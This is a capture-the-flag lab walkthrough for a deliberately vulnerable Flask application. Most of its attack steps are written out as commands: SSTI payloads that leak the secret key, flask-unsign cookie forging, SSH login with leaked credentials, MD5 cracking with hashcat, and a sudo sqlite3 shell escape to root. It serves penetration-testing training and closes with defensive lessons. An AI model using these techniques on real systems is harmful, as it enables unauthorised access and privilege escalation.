Avatar

Labs / FortiPy

  • Hard
  • Released 01 Oct 2025

🔥 Can you penetrate this corporate fortress and achieve total system control?

A mysterious corporate application called TechSphere has caught your attention. 🕵️ Behind its professional facade lies a complex security landscape waiting to be explored. This multi-layered penetration testing scenario will challenge your reconnaissance skills, exploitation techniques, and system analysis capabilities. 💻 Are you ready to navigate through the corporate security infrastructure and demonstrate your expertise? 🏆

2
Flags
70
Points
Hard
Solution Available
Free Access
Start Lab Environment

Launch your dedicated AWS machine to begin hacking

~1-2 min setup
AWS dedicated
Private instance
Industry standard
Hard

🔐 FortiPy - Complete Solution

Objective: Exploit a Flask web application through multiple attack vectors including SSTI, session manipulation, SSH access, database enumeration, hash cracking, and privilege escalation to achieve root access.
🔍 Step 1: Initial Network Reconnaissance

Begin by scanning the target system to identify available services and potential attack vectors:

nmap -sC -sV -Pn <target-ip>

The scan reveals the following services:

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0 (protocol 2.0)
80/tcp open http Werkzeug httpd 3.1.3 (Python 3.12.11)
|_http-title: TechSphere Innovations
|_http-server-header: Werkzeug/3.1.3 Python/3.12.11

Key Findings:

  • SSH service on port 22 (OpenSSH 10.0)
  • Python Flask web application on port 80 using Werkzeug
  • Application title: "TechSphere Innovations"
🔍 Step 2: Web Application Initial Access

Navigate to http://<target-ip> to access the TechSphere web application. You'll see a corporate portal with registration and login functionality.

2.1: Create User Account

Click on "Get Started" or "Register" to create a new account:

Username: testuser
Password: password123

Complete the registration process to create your account.

2.2: Login to Access Dashboard

After registration, login with your credentials to access the user dashboard. This step is crucial as it provides you with a valid session cookie that you'll need for later exploitation.

Once logged in, you'll see several features:

  • Console: Limited command execution (ls, pwd, whoami only)
  • Upload: File upload functionality (accepts only .txt files - no use for us)
  • Debug: Debug logs section
  • Dashboard: Main user interface
🔍 Step 3: Directory Enumeration

Use directory busting to discover hidden endpoints that aren't visible in the main navigation:

gobuster dir -u http://<target-ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

This reveals several important endpoints:

  • /member_login - Alternative login interface
  • /welcome - Welcome page with user parameter
  • /sshadmin - SSH administration panel (requires admin access)
🔍 Step 4: Server-Side Template Injection Discovery
4.1: Access Member Login

Navigate to http://<target-ip>/member_login. This page presents a different login interface with a username field.

4.2: Test for SSTI Vulnerability

Enter a basic SSTI payload in the username field:

{{7*7}}

Submit the form and observe that you're redirected to /welcome with your input reflected. If the page displays "49" instead of "{{7*7}}", you've confirmed SSTI vulnerability.

4.3: Extract Flask Configuration

Use an advanced SSTI payload to extract Flask application configuration:

{{config.items()}}

This payload reveals sensitive configuration information including the Flask SECRET_KEY:

SECRET_KEY: evjcLayPlvdm1UAuNZqpZeVVyyJzYKB5cpLFvUbNMv6FeEYQM4
🔍 Step 5: Flask Session Cookie Manipulation
5.1: Capture Current Session Cookie

Open browser Developer Tools (F12) and navigate to the Application/Storage tab. Locate the session cookie (usually named "session") and copy its value.

5.2: Decode Current Cookie

Use flask-unsign to decode your current session cookie and understand its structure:

flask-unsign --decode --cookie "your_session_cookie_here" --secret "evjcLayPlvdm1UAuNZqpZeVVyyJzYKB5cpLFvUbNMv6FeEYQM4"

This reveals the current session structure, typically showing your user role as "user".

5.3: Forge Administrative Cookie

Create a new session cookie with administrative privileges:

flask-unsign --sign --secret "evjcLayPlvdm1UAuNZqpZeVVyyJzYKB5cpLFvUbNMv6FeEYQM4" --cookie '{"role": "admin", "user": "admin"}'
5.4: Replace Session Cookie

In the browser Developer Tools:

  1. Navigate to Application/Storage → Cookies
  2. Find the session cookie
  3. Replace its value with the forged administrative cookie
  4. Refresh the page
🔍 Step 6: Access SSH Administration Panel

With your forged admin cookie, navigate to http://<target-ip>/sshadmin. You should now have access to the SSH administration panel that displays a list of SSH credentials for users devadmin0 through devadmin24.

The panel reveals multiple SSH credentials, but only one is valid:

Valid Credential:
Username: devadmin14
Password: secureADMINpass001
🔍 Step 7: SSH Access and User Flag
7.1: Connect via SSH

Use the discovered credentials to connect to the target system:

ssh devadmin14@<target-ip>

When prompted, enter the password: secureADMINpass001

7.2: Retrieve User Flag

Once connected, explore the home directory and retrieve the user flag:

ls -la /home/devadmin14/
cat /home/devadmin14/flag-user.txt
🔍 Step 8: Database Configuration Discovery
8.1: Explore Home Directory

Examine the devadmin14 home directory for additional files:

ls -la /home/devadmin14/
cat /home/devadmin14/db_config.ini

This reveals database credentials:

Database Credentials:
Username: sqluser
Password: sqlpass123
8.2: Switch to SQL User

Use the discovered credentials to switch to the sqluser account:

su sqluser

Enter the password: sqlpass123

🔍 Step 9: Database Enumeration
9.1: Access SQLite Database

Locate and access the SQLite database:

find / -name "*.db" 2>/dev/null
sqlite3 /opt/database/database.db
9.2: Enumerate Database Tables

Within the SQLite prompt, explore the database structure:

.tables
.schema oldcreds
SELECT * FROM oldcreds;

This reveals several user password hashes, including:

sqladmin hash: 6e70d06760276024943e0ec1339ef527
9.3: Extract Target Hash

Focus on the sqladmin user hash:

SELECT * FROM oldcreds WHERE user='sqladmin';
🔍 Step 10: Hash Cracking
10.1: Identify Hash Type

The hash appears to be MD5 (32 characters, hexadecimal). Verify using hash identification tools if needed:

echo "6e70d06760276024943e0ec1339ef527" | hashid
10.2: Crack the Hash

Use hashcat to crack the MD5 hash:

echo "6e70d06760276024943e0ec1339ef527" > sqladmin_hash.txt
hashcat -m 0 -a 0 sqladmin_hash.txt /usr/share/wordlists/rockyou.txt

The cracked password is: sqlvb60foxpro

10.3: Switch to SQL Admin

Use the cracked password to switch to the sqladmin account:

su sqladmin

Enter the password: sqlvb60foxpro

🔍 Step 11: Privilege Escalation to Root
11.1: Check Sudo Privileges

Examine what sudo privileges the sqladmin user has:

sudo -l

This reveals that sqladmin can run sqlite3 with sudo privileges:

sqladmin ALL=(ALL) NOPASSWD: /usr/bin/sqlite3 /opt/database/database.db
11.2: Exploit SQLite Shell Escape

Use the sudo sqlite3 permission to escalate privileges:

sudo sqlite3 /opt/database/database.db

Within the SQLite prompt, use the shell escape feature:

.shell /bin/sh
11.3: Verify Root Access

Confirm you have root privileges:

whoami
id
ls -la /root/
11.4: Retrieve Root Flag

Access and retrieve the root flag:

cat /root/flag-root.txt
📚 Key Learning Points
  • SSTI Exploitation: Server-Side Template Injection can lead to sensitive configuration disclosure
  • Flask Security: Exposed secret keys enable session cookie manipulation
  • Directory Enumeration: Hidden endpoints often contain administrative functionality
  • Session Management: Improper session validation allows privilege escalation
  • Credential Reuse: Database credentials found in configuration files enable lateral movement
  • Hash Cracking: Weak passwords in databases can be cracked for further access
  • Sudo Misconfigurations: Overprivileged sudo rules enable privilege escalation
  • Binary Exploitation: SQLite's shell escape feature provides command execution
🛡️ Security Implications
  • Input Validation: Properly sanitize user input to prevent SSTI attacks
  • Secret Management: Never expose Flask secret keys through SSTI or other vulnerabilities
  • Session Security: Implement proper session validation and role checking
  • Credential Storage: Avoid storing database credentials in plaintext configuration files
  • Password Policies: Enforce strong password policies and avoid weak passwords
  • Sudo Configuration: Follow principle of least privilege for sudo rules
  • Binary Restrictions: Be cautious when granting sudo access to powerful binaries like sqlite3
Attack Chain Summary:
Web Registration → SSTI Discovery → Flask Secret Extraction → Cookie Manipulation → Admin Access → SSH Credentials → Database Access → Hash Cracking → Sudo Exploitation → Root Shell